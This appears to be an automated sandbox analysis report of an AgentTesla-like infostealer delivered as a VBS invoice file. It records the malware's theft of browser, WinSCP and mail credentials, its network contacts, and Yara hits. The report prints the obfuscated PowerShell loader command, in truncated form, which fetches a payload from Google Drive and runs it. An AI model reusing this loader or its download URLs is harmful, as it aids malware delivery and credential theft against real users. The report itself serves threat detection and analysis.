Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Code function: 12_2_00383675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

12_2_00383675

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
114.142.162.17	mail.cash4cars.nz	Australia	133525	SERVERMULE-AS-APNimbus2PtyLtdAU	false
74.125.138.132	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
64.233.185.138	drive.google.com	United States	15169	GOOGLEUS	false

Contacted Domains

Name	IP	Active
mail.cash4cars.nz	114.142.162.17	true
drive.google.com	64.233.185.138	true
drive.usercontent.google.com	74.125.138.132	true
ip-api.com	208.95.112.1	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line/?fields=hosting	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: Factura2.vbs

Virustotal: Detection: 16%

Perma Link

Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbXiz source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2595421485.0000000007B7E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbf` source: powershell.exe, 00000005.00000002.2595421485.0000000007B5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wab.pdb source: newfile.exe

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49713 -> 114.142.162.17:26

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 114.142.162.17 114.142.162.17

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

May check the online IP address of the machine

Source: unknown

DNS query: name: ip-api.com

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1oSzyNfPKz4RWIFqVMV8vS6HK702iP0vT&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: powershell.exe, 00000005.00000002.2595421485.0000000007B4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microsoft
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: wscript.exe, 00000000.00000003.2078025193.000001EA770EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079148456.000001EA77157000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2079442238.000001EA79110000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: wscript.exe, 00000000.00000003.2069751324.000001EA79433000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186b73
Source: wscript.exe, 00000000.00000003.2070135793.000001EA79419000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?28bc1f7186
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2774144836.00000243A8191000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.2588020964.0000000005011000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.googPb
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9A4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A83B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGP
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgGXR
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.googh
Source: powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A861C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1TEInJuNeai-SRI4Cb40U9krl2X7xjDgG&export=download
Source: powershell.exe, 00000005.00000002.2588020964.0000000005167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2774144836.00000243A95EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2895451341.00000243B8200000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2591546419.0000000006078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2774144836.00000243A9F64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A8618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2774144836.00000243A9F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 64.233.185.138:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 74.125.138.132:443 -> 192.168.2.6:49711 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: amsi32_6136.amsi.csv, type: OTHER	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5672, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6136, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6388
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6388	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: Commandline size = 6388	Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Enchodontoid = 1;$Multinervate='Substrin';$Multinervate+='g';Function Pisseskn($Parate){$Nongelatinizing=$Parate.Length-$Enchodontoid;For($Agrestical=5; $Agrestical -lt $Nongelatinizing; $Agrestical+=(6)){$Dextranase88+=$Parate.$Multinervate.Invoke($Agrestical, $Enchodontoid);}$Dextranase88;}function Saprophagan($Factories){. ($Laurikke) ($Factories);}$Hovedvrker=Pisseskn 'addleMS,steo .andzConfoi Vejrl ReavlPrintaB.une/Ca,ro5.icit.Choos0Skide Lnnin(DuellW desiiMonopnWap.kdSavanoIslanwdoercs Emer BromNUoverTAxopo Opri.1Allia0Forel.Vaing0 comb;Angre DecorWGraeni Femin G.in6Kursu4Ect,c;ko tr Parenxtyede6Tri,h4taffe;Phary Elle,r,uresv Kipe:,eseg1Hjemm2Hjlpe1klogt. igne0Prd k) Hove AlterGDis aeJonnhcStrafkF,rudoPseud/ St,w2R vhu0Digi.1,ecir0Fersk0nakke1K.ass0 Mese1 ield OsphrFKlon.iFemaarKlebieBrontf S.tyoAmtsrxBorte/ Fron1Excla2Butto1 Publ.Svesk0Handl ';$Nuanceret=Pisseskn ' SdelURepansMedhoeHe.lirPar a-El,vaAUkasegPoca,eMagtkn divvtIodat ';$unshady=Pisseskn 'Xylo.h RabbtHalfhtmika,pt,lles Ayyu: Un,o/ Inka/D.kkedBo edrDicari BeravPl,caeCo.pa.Dem bg HusnoVelbeoBann,gAnno,lTandsedegne. Swinc Fel,oRebanmDemou/EndkkuDieumcAd oc?Dag oeS,rtlx sadapBhaktonond r UdtrtG imr=TobacdDefraocl.ngwVkke nWeakalFulfioPlatoaFo.stdStorb&KlbesiPessudBatte=Stv r1OneraTSpermE,elveIMesmen re.tJSkoleuFidg.NStopne ,rstahimmeiAbiol- TaleSContrRBes.iIBarbo4 UndeC emibSuppl4Freed0 DagdUTartr9Aeropk.elefrUdsy,lExecu2TraveXCoemp7AntirxHypoej MbelD,imelg reenG.orsc ';$Dousers=Pisseskn 'T llb>Reimm ';$Laurikke=Pisseskn 'AfpluigrligeDemorxLuckf ';$Flyvestolene = Pisseskn ' UnwoeKil.bcvibrihOpsplo.ibbe mic,o%daiquaHeroepGoldepUd,krdSteelatum.dtOustia A,ch%Brsli\ PorcM ShifeSinopr TykeoMythogSkorsaSkat sGastrt TrihrIntrau Pu.sl.iuntaCentr.DigamB autoeGrammsHouse Pid.l&Grumo&Und p Delfe Sst.cp,rtuhPigmeoFrt s Toppl$Objec ';Saprophagan (Pisseskn ' Punk$ Di ogSa valSlagbo S bubUnscaa fluelMisl.:OmbytAL.mbasQuee sIdioteUlempv JoureTimbrrNaadia.usiktNong.iOrgannIndbrg onti=U,ear(F attcVelsemStevedNe hu Eks m/OmskrcLetfr ota$ VentFKern.lSciopy .igtv ReleeS,less Snakt TradoU.bell FireecoelonTot.ee malt)Afspn ');Saprophagan (Pisseskn 'junke$ nsig AppalunderoepipabIsraea Lit.lpresu:ParitFGavend SyfirGra.ue vendnNonpreResidh ChanjHardme Bedrm Stil= Chil$ armu SponnPa.klsBagflh.edbia epowdBe,tsy.icla.Daa,esNringpUnexplOperci scat.ornb( drud$ ApolDGiftioObjekuDenatsT,efoePhr.tr UnoxsIndkr)Vel.o ');$unshady=$Fdrenehjem[0];Saprophagan (Pisseskn 'Nupti$De,meg .krol TakkoAl.opb Spe.aGelatlvarpn:SprreBunfelaEfteraSkoledPetrorunderuUndlitWor heSkakbnMicro=cilioN TraceNonf,wU hen-TradiO SalibInscrjA tikeU insc HeadtResta .gtesSBlo,kyUdlndsNonsutFjor.e.aukam Radi.,ysteNIlluveKupeettinkr.StatiWHjlpeeSnarebP.radCUr allHangoiHexace,phemn C litPensi ');Saprophagan (Pisseskn 'philo$triumB Bun a Unp.aSubagdFo,kerDah iu.ridntSengeeSkruenSched. B.rgHAnchye DuraarangsdPrivael			Jump to behavior

Detected potential crypto function

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3489B611	2_2_00007FFD3489B611
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD3489C3C1	2_2_00007FFD3489C3C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD348960FA	2_2_00007FFD348960FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34896090	2_2_00007FFD34896090
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34896715	2_2_00007FFD34896715
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD34893BFB	2_2_00007FFD34893BFB
